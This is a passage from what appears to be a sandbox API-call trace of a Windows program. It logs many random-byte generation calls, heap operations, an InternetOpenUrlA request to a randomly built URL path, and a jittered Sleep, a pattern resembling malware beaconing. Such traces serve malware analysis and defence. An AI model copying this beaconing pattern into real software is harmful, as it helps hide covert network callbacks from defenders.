pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0274.280] GetProcessHeap () returned 0x440000 [0274.280] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x33) returned 0x4f4e70 [0274.281] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.281] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0274.281] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.281] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4f4e71, cbBuffer=0x1b, dwFlags=0x2 | out: pbBuffer=0x4f4e71) returned 0x0 [0274.281] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.281] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0274.282] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.282] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.282] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.282] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.282] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.282] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0274.282] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.282] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.282] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.283] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0274.283] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.283] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.283] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.283] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.283] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.283] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.283] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.284] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.284] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.284] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0274.284] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.284] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0274.284] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.285] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.285] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.285] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.285] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.285] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.285] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.285] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.286] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.286] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.286] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.286] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.286] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.286] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.286] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.286] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.287] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.287] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.287] GetProcessHeap () returned 0x440000 [0274.287] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x4726f0 [0274.287] lstrcpyA (in: lpString1=0x4726f0, lpString2="\x81\x03" | out: lpString1="\x81\x03") returned="\x81\x03" [0274.287] lstrcatA (in: lpString1="\x81\x03", lpString2="/2usPjs2xf1chbqhT4rruhivcnu/" | out: lpString1="\x81\x03/2usPjs2xf1chbqhT4rruhivcnu/") returned="\x81\x03/2usPjs2xf1chbqhT4rruhivcnu/" [0274.287] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0274.287] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x81\x03/2usPjs2xf1chbqhT4rruhivcnu/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0274.287] GetProcessHeap () returned 0x440000 [0274.287] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4726f0 | out: hHeap=0x440000) returned 1 [0274.287] GetProcessHeap () returned 0x440000 [0274.287] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4f4e70 | out: hHeap=0x440000) returned 1 [0274.288] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0274.288] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0274.288] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.288] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0274.288] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0274.288] Sleep (dwMilliseconds=0x17271) [0274.445] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.445] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0274.445] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.445] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0274.445] GetProcessHeap () returned 0x440000 [0274.445] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xc6) returned 0x4d5e20 [0274.445] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.445] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0274.446] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.446] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d5e21, cbBuffer=0x29, dwFlags=0x2 | out: pbBuffer=0x4d5e21) returned 0x0 [0274.446] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.446] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0274.447] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.447] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0274.447] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.447] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.447] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.447] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.447] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.447] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.448] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.448] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.448] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.448] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0274.448] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.448] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0274.449] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.449] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.449] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.449] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0274.449] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.449] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.449] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.449] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0274.450] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.450] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.450] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.450] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.450] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.450] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.450] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.450] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0274.451] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.451] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.451] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.451] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0274.451] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.451] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0274.451] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.451] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.451] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.451] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.451] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.451] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.452] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.452] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.452] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.452] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.452] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.452] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.452] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.452] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.452] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.452] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.453] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.453] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.453] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.453] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0274.453] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.453] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d5e4a, cbBuffer=0x19, dwFlags=0x2 | out: pbBuffer=0x4d5e4a) returned 0x0 [0274.453] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.453] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.453] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.453] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.454] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.454] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.454] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.454] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.454] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.454] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.454] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.454] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.455] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.455] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0274.455] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.455] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.455] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.455] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.455] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.455] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.455] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.455] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0274.456] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.456] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.456] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.456] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.456] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.456] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0274.457] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.457] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.457] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.457] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.457] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.457] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0274.457] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.457] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0274.457] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.457] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d5e63, cbBuffer=0x26, dwFlags=0x2 | out: pbBuffer=0x4d5e63) returned 0x0 [0274.457] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.457] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.458] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.458] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.458] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.458] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.458] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.458] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.458] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.458] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.459] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.459] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.459] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.459] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.459] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.459] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.459] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.459] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.459] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.459] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0274.460] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.460] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.460] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.460] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: 